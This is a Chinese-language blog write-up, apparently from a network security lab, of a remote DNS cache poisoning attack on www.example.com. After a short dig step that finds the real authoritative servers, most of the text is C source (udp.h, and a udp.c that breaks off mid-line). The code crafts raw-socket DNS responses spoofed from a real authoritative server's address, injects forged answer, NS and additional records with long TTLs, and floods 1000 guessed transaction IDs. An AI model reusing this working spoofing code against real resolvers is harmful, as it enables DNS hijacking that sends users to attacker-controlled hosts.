<p>在攻击机<code>dig www.example.com</code>，查看<code>www.example.com</code>真正的权威DNS服务器ip为199.43.135.53和199.43.133.53，如图所示：</p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B7.png"></p>
<p>使用199.43.133.53作为我们伪造响应报文的源ip，编写udp.h和udp.c代码，构造查询报文和响应报文，并且修改id和查询域名，不断发送查询报文和相应的响应报文。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//udp.h</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;netinet/ip.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;netinet/udp.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;errno.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;libnet.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> PCKT_LEN 8192</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> FLAG_R 0x8400</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> FLAG_Q 0x0100</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">ipheader</span> &#123;</span></span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">char</span>      iph_ihl:<span class="number">4</span>, iph_ver:<span class="number">4</span>;</span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">char</span>      iph_tos;</span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> iph_len;</span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> iph_ident;</span><br><span class="line"> <span class="comment">//    unsigned char      iph_flag;</span></span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> iph_offset;</span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">char</span>      iph_ttl;</span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">char</span>      iph_protocol;</span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> iph_chksum;</span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">int</span>       iph_sourceip;</span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">int</span>       iph_destip;</span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// UDP header&#x27;s structure</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">udpheader</span> &#123;</span></span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> udph_srcport;</span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> udph_destport;</span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> udph_len;</span><br><span class="line">     <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> udph_chksum;</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">dnsheader</span> &#123;</span></span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> query_id;</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> flags;</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> QDCOUNT;</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> ANCOUNT;</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> NSCOUNT;</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> ARCOUNT;</span><br><span class="line">&#125;;</span><br><span class="line"><span class="comment">// This structure just for convinience in the DNS packet, because such 4 byte data often appears. </span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">dataEnd</span>&#123;</span></span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span>  type;</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span>  <span class="class"><span class="keyword">class</span>;</span></span><br><span class="line">&#125;;</span><br><span class="line">    <span class="comment">// total udp header length: 8 bytes (=64 bits)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// structure to hold the answer end section</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">ansEnd</span>&#123;</span></span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> type;</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> <span class="class"><span class="keyword">class</span>;</span></span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> ttl_l;</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> ttl_h;</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> datalen;</span><br><span class="line">&#125;; </span><br><span class="line"></span><br><span class="line"><span class="comment">// structure to hold the authorative nameserver end section</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">nsEnd</span>&#123;</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> type;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> <span class="class"><span class="keyword">class</span>;</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> ttl_l;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> ttl_h;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> datalen;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">unsigned</span> <span class="keyword">int</span> <span class="title">checksum</span><span class="params">(<span class="keyword">uint16_t</span> *usBuff, <span class="keyword">int</span> isize)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">int</span> cksum=<span class="number">0</span>;</span><br><span class="line">	<span class="keyword">for</span>(;isize&gt;<span class="number">1</span>;isize-=<span class="number">2</span>)	cksum+=*usBuff++;</span><br><span class="line">	<span class="keyword">if</span>(isize==<span class="number">1</span>)	 cksum+=*(<span class="keyword">uint16_t</span> *)usBuff;</span><br><span class="line">	<span class="keyword">return</span> (cksum);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// calculate udp checksum</span></span><br><span class="line"><span class="function"><span class="keyword">uint16_t</span> <span class="title">check_udp_sum</span><span class="params">(<span class="keyword">uint8_t</span> *buffer, <span class="keyword">int</span> len)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> sum=<span class="number">0</span>;</span><br><span class="line">	<span class="class"><span class="keyword">struct</span> <span class="title">ipheader</span> *<span class="title">tempI</span>=</span>(struct ipheader *)(buffer);</span><br><span class="line">	<span class="class"><span class="keyword">struct</span> <span class="title">udpheader</span> *<span class="title">tempH</span>=</span>(struct udpheader *)(buffer+<span class="keyword">sizeof</span>(struct ipheader));</span><br><span class="line">	<span class="class"><span class="keyword">struct</span> <span class="title">dnsheader</span> *<span class="title">tempD</span>=</span>(struct dnsheader *)(buffer+<span class="keyword">sizeof</span>(struct ipheader)+<span class="keyword">sizeof</span>(struct udpheader));</span><br><span class="line">	tempH-&gt;udph_chksum=<span class="number">0</span>;</span><br><span class="line">	sum=checksum( (<span class="keyword">uint16_t</span> *)   &amp;(tempI-&gt;iph_sourceip) ,<span class="number">8</span> );</span><br><span class="line">	sum+=checksum((<span class="keyword">uint16_t</span> *) tempH,len);</span><br><span class="line">	sum+=ntohs(IPPROTO_UDP+len);</span><br><span class="line">	sum=(sum&gt;&gt;<span class="number">16</span>)+(sum &amp; <span class="number">0x0000ffff</span>);</span><br><span class="line">	sum+=(sum&gt;&gt;<span class="number">16</span>);</span><br><span class="line">	<span class="keyword">return</span> (<span class="keyword">uint16_t</span>)(~sum);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Function for checksum calculation. From the RFC,</span></span><br><span class="line"><span class="comment">// the checksum algorithm is:</span></span><br><span class="line"><span class="comment">//  &quot;The checksum field is the 16 bit one&#x27;s complement of the one&#x27;s</span></span><br><span class="line"><span class="comment">//  complement sum of all 16 bit words in the header.  For purposes of</span></span><br><span class="line"><span class="comment">//  computing the checksum, the value of the checksum field is zero.&quot;</span></span><br><span class="line"><span class="function"><span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="title">csum</span><span class="params">(<span class="keyword">unsigned</span> <span class="keyword">short</span> *buf, <span class="keyword">int</span> nwords)</span></span></span><br><span class="line"><span class="function"></span>&#123;       <span class="comment">//</span></span><br><span class="line">        <span class="keyword">unsigned</span> <span class="keyword">long</span> sum;</span><br><span class="line">        <span class="keyword">for</span>(sum=<span class="number">0</span>; nwords&gt;<span class="number">0</span>; nwords--)        sum += *buf++;</span><br><span class="line">        sum = (sum &gt;&gt; <span class="number">16</span>) + (sum &amp;<span class="number">0xffff</span>);</span><br><span class="line">        sum += (sum &gt;&gt; <span class="number">16</span>);</span><br><span class="line">        <span class="keyword">return</span> (<span class="keyword">unsigned</span> <span class="keyword">short</span>)(~sum);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//construct response packet</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">response</span><span class="params">(<span class="keyword">char</span>* req_url, <span class="keyword">char</span>* src_addr, <span class="keyword">char</span>* des_addr)</span></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> sd;</span><br><span class="line">	<span class="keyword">char</span> buffer[PCKT_LEN];</span><br><span class="line">	<span class="built_in">memset</span>(buffer, <span class="number">0</span>, PCKT_LEN);</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">ipheader</span> *<span class="title">ip</span> =</span> (struct ipheader *) buffer;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">udpheader</span> *<span class="title">udp</span> =</span> (struct udpheader *) (buffer + <span class="keyword">sizeof</span>(struct ipheader));</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">dnsheader</span> *<span class="title">dns</span>=</span>(struct dnsheader*) (buffer +<span class="keyword">sizeof</span>(struct ipheader)+<span class="keyword">sizeof</span>(struct udpheader));</span><br><span class="line"> <span class="keyword">int</span> t = <span class="keyword">sizeof</span>(struct ipheader)+<span class="keyword">sizeof</span>(struct udpheader)+<span class="keyword">sizeof</span>(struct dnsheader);</span><br><span class="line"><span class="comment">//	printf(&quot;t=%d,iphead=%d,udphead=%d,dnshead=%d\n&quot;,t,sizeof(struct ipheader),sizeof(struct udpheader),sizeof(struct dnsheader));</span></span><br><span class="line">    <span class="keyword">char</span> *data=(buffer + t);</span><br><span class="line">    dns-&gt;flags = htons(FLAG_R);</span><br><span class="line">    dns-&gt;QDCOUNT=htons(<span class="number">1</span>);</span><br><span class="line">    dns-&gt;ANCOUNT=htons(<span class="number">1</span>);</span><br><span class="line">    dns-&gt;NSCOUNT=htons(<span class="number">1</span>);</span><br><span class="line">    dns-&gt;ARCOUNT=htons(<span class="number">1</span>);</span><br><span class="line">    <span class="built_in">strcpy</span>(data,req_url);</span><br><span class="line">    <span class="keyword">int</span> length = <span class="built_in">strlen</span>(data) + <span class="number">1</span>;    </span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">dataEnd</span> * <span class="title">end</span>=</span>(struct dataEnd *)(data+length);</span><br><span class="line">    end-&gt;type=htons(<span class="number">1</span>);</span><br><span class="line">    end-&gt;<span class="class"><span class="keyword">class</span>=</span>htons(<span class="number">1</span>);</span><br><span class="line">	<span class="comment">//printf(&quot;data=%s\n&quot;,data);</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">char</span> *ans=(buffer +t+<span class="keyword">sizeof</span>(struct dataEnd)+length);</span><br><span class="line">    <span class="built_in">strcpy</span>(ans,req_url);</span><br><span class="line">	<span class="comment">//printf(&quot;ans=%s\n&quot;,ans);</span></span><br><span class="line">    <span class="keyword">int</span> anslength = <span class="built_in">strlen</span>(ans) + <span class="number">1</span>;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">ansEnd</span> * <span class="title">ansend</span> =</span> (struct ansEnd *)(ans + anslength);</span><br><span class="line">    ansend-&gt;type = htons(<span class="number">1</span>);</span><br><span class="line">    ansend-&gt;<span class="class"><span class="keyword">class</span> =</span> htons(<span class="number">1</span>);</span><br><span class="line">    ansend-&gt;ttl_l = htons(<span class="number">0x00</span>);</span><br><span class="line">    ansend-&gt;ttl_h = htons(<span class="number">0xFFFF</span>);</span><br><span class="line">    ansend-&gt;datalen=htons(<span class="number">4</span>);</span><br><span class="line">    <span class="keyword">char</span> *ansaddr=(buffer +t+<span class="keyword">sizeof</span>(struct dataEnd)+length+<span class="keyword">sizeof</span>(struct ansEnd)+anslength);</span><br><span class="line">	<span class="built_in">strcpy</span>(ansaddr,<span class="string">&quot;\xac\x11&quot;</span>);       <span class="comment">//172.17. //\x00\x01</span></span><br><span class="line">	*(ansaddr+<span class="number">3</span>) = <span class="number">1</span>;</span><br><span class="line">	<span class="keyword">int</span> addrlen = <span class="built_in">strlen</span>(ansaddr)+<span class="number">2</span>;   <span class="comment">//dispose /0 problem</span></span><br><span class="line"></span><br><span class="line">	<span class="keyword">char</span> *ns =(buffer +t+<span class="keyword">sizeof</span>(struct dataEnd)+length+<span class="keyword">sizeof</span>(struct ansEnd)+anslength+addrlen);</span><br><span class="line">	<span class="built_in">strcpy</span>(ns,<span class="string">&quot;\7example\3com&quot;</span>);</span><br><span class="line">	<span class="keyword">int</span> nslength= <span class="built_in">strlen</span>(ns)+<span class="number">1</span>;</span><br><span class="line">	<span class="class"><span class="keyword">struct</span> <span class="title">nsEnd</span> * <span class="title">nsend</span>=</span>(struct nsEnd *)(ns+nslength);</span><br><span class="line">	nsend-&gt;type=htons(<span class="number">2</span>);</span><br><span class="line">	nsend-&gt;<span class="class"><span class="keyword">class</span>=</span>htons(<span class="number">1</span>);</span><br><span class="line">    nsend-&gt;ttl_l=htons(<span class="number">0x00</span>);</span><br><span class="line">    nsend-&gt;ttl_h=htons(<span class="number">0xFFFF</span>);   <span class="comment">//tll,ŒŽÓÐÐ§µÄÊ±Œä</span></span><br><span class="line">    nsend-&gt;datalen=htons(<span class="number">21</span>); </span><br><span class="line">	<span class="keyword">char</span> *nsname=(buffer +t+<span class="keyword">sizeof</span>(struct dataEnd)+length+<span class="keyword">sizeof</span>(struct ansEnd)+anslength+addrlen+<span class="keyword">sizeof</span>(struct nsEnd)+nslength);</span><br><span class="line">	<span class="built_in">strcpy</span>(nsname,<span class="string">&quot;\2ns\7huyiman\3net&quot;</span>);</span><br><span class="line">	<span class="keyword">int</span> nsnamelen = <span class="built_in">strlen</span>(nsname)+<span class="number">1</span>;</span><br><span class="line">	</span><br><span class="line"> 	<span class="keyword">char</span> *ar=(buffer +t+<span class="keyword">sizeof</span>(struct dataEnd)+length+<span class="keyword">sizeof</span>(struct ansEnd)+anslength+addrlen+<span class="keyword">sizeof</span>(struct nsEnd)+nslength+nsnamelen);</span><br><span class="line">    <span class="built_in">strcpy</span>(ar,<span class="string">&quot;\2ns\7huyiman\3net&quot;</span>);</span><br><span class="line">    <span class="keyword">int</span> arlength = <span class="built_in">strlen</span>(ar)+<span class="number">1</span>;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">ansEnd</span>* <span class="title">arend</span> =</span> (struct ansEnd*)(ar + arlength);</span><br><span class="line">    arend-&gt;type = htons(<span class="number">1</span>);</span><br><span class="line">    arend-&gt;<span class="class"><span class="keyword">class</span>=</span>htons(<span class="number">1</span>);</span><br><span class="line">    arend-&gt;ttl_l=htons(<span class="number">0x00</span>);</span><br><span class="line">    arend-&gt;ttl_h=htons(<span class="number">0xFFFF</span>);</span><br><span class="line">    arend-&gt;datalen=htons(<span class="number">4</span>);</span><br><span class="line">    <span class="keyword">char</span> *araddr=(buffer +t+<span class="keyword">sizeof</span>(struct dataEnd)+length+<span class="keyword">sizeof</span>(struct ansEnd)+anslength+addrlen+<span class="keyword">sizeof</span>(struct nsEnd)+nslength+nsnamelen+arlength+<span class="keyword">sizeof</span>(struct ansEnd));</span><br><span class="line">    <span class="built_in">strcpy</span>(araddr,<span class="string">&quot;\xac\x11&quot;</span>);</span><br><span class="line">    *(araddr+<span class="number">3</span>) = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">int</span> araddrlen = <span class="built_in">strlen</span>(araddr) + <span class="number">2</span>;	</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">sockaddr_in</span> <span class="title">sin</span>, <span class="title">din</span>;</span>  	 <span class="keyword">int</span> one = <span class="number">1</span>; 	 <span class="keyword">const</span> <span class="keyword">int</span> *val = &amp;one;</span><br><span class="line">    sd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);</span><br><span class="line">    <span class="keyword">if</span>(sd&lt;<span class="number">0</span> ) 	<span class="built_in">printf</span>(<span class="string">&quot;socket error\n&quot;</span>);</span><br><span class="line">    <span class="built_in">sin</span>.sin_family = AF_INET;</span><br><span class="line">    din.sin_family = AF_INET;</span><br><span class="line">    <span class="built_in">sin</span>.sin_port = htons(<span class="number">33333</span>);</span><br><span class="line">    din.sin_port = htons(<span class="number">53</span>);</span><br><span class="line">    <span class="built_in">sin</span>.sin_addr.s_addr = inet_addr(src_addr);</span><br><span class="line">    din.sin_addr.s_addr = inet_addr(<span class="string">&quot;199.43.133.53&quot;</span>);</span><br><span class="line">    ip-&gt;iph_ihl = <span class="number">5</span>; </span><br><span class="line">    ip-&gt;iph_ver = <span class="number">4</span>;</span><br><span class="line">    ip-&gt;iph_tos = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> packetLength =(<span class="keyword">sizeof</span>(struct ipheader) + <span class="keyword">sizeof</span>(struct udpheader)+<span class="keyword">sizeof</span>(struct dnsheader)+length+<span class="keyword">sizeof</span>(struct dataEnd)+anslength+<span class="keyword">sizeof</span>( struct ansEnd)+nslength+<span class="keyword">sizeof</span>(struct nsEnd)+addrlen+nsnamelen+arlength+<span class="keyword">sizeof</span>(struct ansEnd)+araddrlen); <span class="comment">// length + dataEnd_size == UDP_payload_size</span></span><br><span class="line">    ip-&gt;iph_len=htons(packetLength);</span><br><span class="line">    ip-&gt;iph_ident = htons(rand());</span><br><span class="line">    ip-&gt;iph_ttl = <span class="number">110</span>;</span><br><span class="line">    ip-&gt;iph_protocol = <span class="number">17</span>;</span><br><span class="line">    ip-&gt;iph_sourceip = inet_addr(<span class="string">&quot;199.43.133.53&quot;</span>);</span><br><span class="line">    ip-&gt;iph_destip = inet_addr(src_addr);</span><br><span class="line">    udp-&gt;udph_srcport = htons(<span class="number">53</span>);</span><br><span class="line">    udp-&gt;udph_destport = htons(<span class="number">33333</span>);</span><br><span class="line">    udp-&gt;udph_len = htons(<span class="keyword">sizeof</span>(struct udpheader)+<span class="keyword">sizeof</span>(struct dnsheader)+length+<span class="keyword">sizeof</span>(struct dataEnd)+anslength+<span class="keyword">sizeof</span>( struct ansEnd)+nslength+<span class="keyword">sizeof</span>(struct nsEnd)+addrlen+nsnamelen+arlength+<span class="keyword">sizeof</span>(struct ansEnd)+araddrlen); <span class="comment">// udp_header_size + udp_payload_size</span></span><br><span class="line">	ip-&gt;iph_chksum = csum((<span class="keyword">unsigned</span> <span class="keyword">short</span> *)buffer, <span class="keyword">sizeof</span>(struct ipheader) + <span class="keyword">sizeof</span>(struct udpheader));</span><br><span class="line">	udp-&gt;udph_chksum=check_udp_sum(buffer, packetLength-<span class="keyword">sizeof</span>(struct ipheader));</span><br><span class="line">	<span class="keyword">if</span>(setsockopt(sd, IPPROTO_IP, IP_HDRINCL, val, <span class="keyword">sizeof</span>(one))&lt;<span class="number">0</span> )</span><br><span class="line">	&#123;</span><br><span class="line">	    <span class="built_in">printf</span>(<span class="string">&quot;error\n&quot;</span>);    </span><br><span class="line">	    <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">int</span> count = <span class="number">1000</span>;</span><br><span class="line">	<span class="keyword">int</span> trans_id = <span class="number">3000</span>;</span><br><span class="line">	<span class="keyword">while</span>(count--)&#123; </span><br><span class="line">	   dns-&gt;query_id=htons(trans_id+count);</span><br><span class="line">    	udp-&gt;udph_chksum=check_udp_sum(buffer, packetLength-<span class="keyword">sizeof</span>(struct ipheader));</span><br><span class="line">	    <span class="keyword">if</span>(sendto(sd, buffer, packetLength, <span class="number">0</span>, (struct sockaddr *)&amp;<span class="built_in">sin</span>, <span class="keyword">sizeof</span>(<span class="built_in">sin</span>)) &lt; <span class="number">0</span>)</span><br><span class="line">	        <span class="built_in">printf</span>(<span class="string">&quot;packet send error %d which means %s\n&quot;</span>,errno,strerror(errno));</span><br><span class="line"></span><br><span class="line">   	&#125;</span><br><span class="line">   	close(sd);</span><br><span class="line">   	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//udp.c</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&quot;udp.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> srcip <span class="meta-string">&quot;172.17.0.1&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> dstip <span class="meta-string">&quot;172.17.0.2&quot;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> sd;</span><br><span class="line">    <span class="keyword">char</span> buffer[PCKT_LEN];</span><br><span class="line">    <span class="built_in">memset</span>(buffer, <span class="number">0</span>, PCKT_LEN);</span><br><span class="line">    <span class="class"><span 